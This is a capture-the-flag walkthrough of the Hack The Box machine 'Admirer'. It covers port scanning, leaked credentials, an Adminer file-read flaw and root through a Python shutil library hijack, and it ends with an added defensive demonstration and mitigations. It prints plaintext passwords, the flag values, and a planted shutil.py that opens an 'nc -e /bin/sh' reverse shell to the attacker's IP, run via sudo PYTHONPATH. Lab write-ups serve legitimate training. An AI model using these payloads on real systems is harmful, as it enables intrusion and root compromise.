Recon

Nmap Scan

Not many ports are open. A full-port scan gives the same result: only three ports, FTP, SSH and web.

# Nmap 7.80 scan initiated Thu May 21 09:18:38 2020 as: nmap -sC -sV -oN nmap/initial -v 10.10.10.187
Nmap scan report for 10.10.10.187
Host is up (0.35s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
| 256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_ 256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/admin-dir
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Admirer
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 21 09:19:00 2020 -- 1 IP address (1 host up) scanned in 22.11 seconds

Foothold

On the web port there is a robots.txt; inspecting it reveals a directory, admin-dir. Brute-forcing that directory with a tool gave the following results.

[403]   http://10.10.10.187/admin-dir/.htaccess
[403] http://10.10.10.187/admin-dir/.htpasswd
[403] http://10.10.10.187/admin-dir/.htpasswd.txt
[403] http://10.10.10.187/admin-dir/.htaccess.txt
[200] http://10.10.10.187/admin-dir/credentials.txt
[200] http://10.10.10.187/admin-dir/contacts.txt

credentials.txt contains the FTP username and password.

[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

Logging in to FTP with that username and password yields a backup of the website's source code and a SQL dump file [not useful]. In index.php of the web source there is a username and password; I tried them for SSH, but the login failed. The web source also reveals a directory, utility-scripts, which returns 403 when accessed directly. Since that directory contains only PHP scripts, I brute-forced it again with the tool. Results:

[403]   http://10.10.10.187/utility-scripts/.htaccess.php
[403] http://10.10.10.187/utility-scripts/.htpasswd.php
[403] http://10.10.10.187/utility-scripts/.htpasswd
[200] http://10.10.10.187/utility-scripts/phptest.php
[200] http://10.10.10.187/utility-scripts/info.php
[200] http://10.10.10.187/utility-scripts/adminer.php
[403] http://10.10.10.187/utility-scripts/.htaccess

User.txt

Inspecting adminer.php shows it is version 4.6.2, which has a serious vulnerability (Link Here) that lets a player bypass authentication and read arbitrary files. The steps are:
1. Start a MySQL service on your own machine and expose it publicly [0.0.0.0].
2. Use adminer.php to log in to the database on your own machine.
3. Follow the instructions at the end of the linked article.

Once done, you obtain the username and password from the current index.php on the web server.

$username = "waldo";
$password = "&<h5b~yK3F#{PaPB&dA}{H>";
$dbname = "admirerdb";

Logging in via SSH with these credentials gives user.txt.

~/Documents/HTB/Admirer root@kali
❯ ssh waldo@10.10.10.187
waldo@10.10.10.187's password:
Linux admirer 4.9.0-12-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Thu May 21 14:11:59 2020 from 10.10.15.10
waldo@admirer:~$ cat user.txt
40671a712c266c8aa563a475533bfc06

Privilege Escalation

root.txt

Reviewing the source of the earlier utility-scripts directory reveals an admin_tasks.php, which executes /opt/scripts/admin_tasks.sh. That directory turns out to be the key to privilege escalation.

<html>
<head>
<title>Administrative Tasks</title>
</head>
<body>
<h3>Admin Tasks Web Interface (v0.01 beta)</h3>
<?php
// Web Interface to the admin_tasks script
//
if(isset($_REQUEST['task']))
{
$task = $_REQUEST['task'];
if($task == '1' || $task == '2' || $task == '3' || $task == '4' ||
$task == '5' || $task == '6' || $task == '7')
{
/***********************************************************************************
Available options:
1) View system uptime
2) View logged in users
3) View crontab (current user only)
4) Backup passwd file (not working)
5) Backup shadow file (not working)
6) Backup web data (not working)
7) Backup database (not working)

NOTE: Options 4-7 are currently NOT working because they need root privileges.
I'm leaving them in the valid tasks in case I figure out a way
to securely run code as root from a PHP page.
************************************************************************************/
echo str_replace("\n", "<br />", shell_exec("/opt/scripts/admin_tasks.sh $task 2>&1"));
}
else
{
echo("Invalid task.");
}
}
?>

<p>
<h4>Select task:</p>
<form method="POST">
<select name="task">
<option value=1>View system uptime</option>
<option value=2>View logged in users</option>
<option value=3>View crontab</option>
<option value=4 disabled>Backup passwd file</option>
<option value=5 disabled>Backup shadow file</option>
<option value=6 disabled>Backup web data</option>
<option value=7 disabled>Backup database</option>
</select>
<input type="submit">
</form>
</body>
</html>

sudo -l shows that we can run admin_tasks.sh as root. Looking at the script, it calls a Python file in the same directory, backup.py.

waldo@admirer:/opt/scripts$ cat admin_tasks.sh
#!/bin/bash
......
......
backup_web()
{
if [ "$EUID" -eq 0 ]
then
echo "Running backup script in the background, it might take a while..."
/opt/scripts/backup.py &
else
echo "Insufficient privileges to perform the selected operation."
fi
}

backup.py uses the make_archive function from shutil. Python library hijacking immediately comes to mind, but we have no write permission in the script's directory.

#!/usr/bin/python3

from shutil import make_archive

src = '/var/www/html/'

# old ftp directory, not used anymore
#dst = '/srv/ftp/html'

dst = '/var/backups/html'

make_archive(dst, 'gztar', src)

With a hint from a forum member I learned the correct syntax for the hijack: save the following Python file as shutil.py in /dev/shm.

import os

def make_archive(a,b,c):
    cmd = "bash -c 'nc -e /bin/sh 10.10.14.105 1337'"
    os.system(cmd)
make_archive(1,2,3)

Run the shell script with the following syntax to get a shell.

sudo PYTHONPATH="/dev/shm" /opt/scripts/admin_tasks.sh

~/Documents/HTB/Admirer root@kali 2m 30s
❯ nc -nlvp 1337
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.187.
Ncat: Connection from 10.10.10.187:36578.
id
whoami
uid=0(root) gid=0(root) groups=0(root)
root
cat ~/root.txt
6d0eef21434772d8c61fc3c03c2a093d
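The root step above works because sudo lets PYTHONPATH reach the privileged interpreter, so a module placed in a writable directory is imported ahead of the standard library's shutil. The example below is added here and is not part of the writeup or the box; it reproduces the search-path behaviour with a harmless constructed shutil.py that only sets a marker, and shows that running the interpreter in isolated mode (-I, which ignores PYTHONPATH, user site-packages and the script directory) defeats the hijack. It also includes a runtime self-check a privileged script could perform before calling make_archive. Function and marker names are my own.

```python
import os
import subprocess
import sys
import sysconfig
import tempfile
import textwrap

# Constructed stand-in for a hijacked module: it only exposes a marker and a
# make_archive() that does nothing, so the demo is observable without side effects.
FAKE_SHUTIL = textwrap.dedent('''
    HIJACK_MARKER = "hijacked-shutil"

    def make_archive(base_name, fmt, root_dir):
        return HIJACK_MARKER
''')

# Child-interpreter probe: report whether the shutil it imported carries the marker.
PROBE = "import shutil; print(getattr(shutil, 'HIJACK_MARKER', 'stdlib'))"


def run_probe(pythonpath_dir, isolated):
    """Run a child interpreter with PYTHONPATH pointed at pythonpath_dir
    (the same channel the writeup uses) and return which shutil it loaded.
    isolated=True adds -I, the mitigation a privileged script should use."""
    env = dict(os.environ, PYTHONPATH=pythonpath_dir)
    argv = [sys.executable]
    if isolated:
        argv.append("-I")
    argv += ["-c", PROBE]
    out = subprocess.run(argv, env=env, capture_output=True, text=True, check=True)
    return out.stdout.strip()


def compare_modes():
    """Return {'default': ..., 'isolated': ...} for one PYTHONPATH containing
    a shutil.py: the default run imports the planted module, -I does not."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "shutil.py"), "w") as f:
            f.write(FAKE_SHUTIL)
        return {"default": run_probe(d, False), "isolated": run_probe(d, True)}


def shutil_is_trusted():
    """Self-check for a privileged backup script: True only if the shutil that
    actually got imported lives under the interpreter's stdlib directory."""
    import shutil
    stdlib = os.path.realpath(sysconfig.get_paths()["stdlib"])
    loaded = os.path.realpath(shutil.__file__)
    return loaded.startswith(stdlib + os.sep)


if __name__ == "__main__":
    print(compare_modes())            # {'default': 'hijacked-shutil', 'isolated': 'stdlib'}
    print("stdlib shutil:", shutil_is_trusted())
```

For a script like /opt/scripts/backup.py the practical fixes are a shebang of the form #!/usr/bin/python3 -I (Linux passes that single argument through) and a sudoers rule that does not grant SETENV or keep PYTHONPATH in env_keep, so that the caller cannot influence the interpreter's module search path at all; the self-check is a last line of defence that at least refuses to proceed when the wrong module has been loaded.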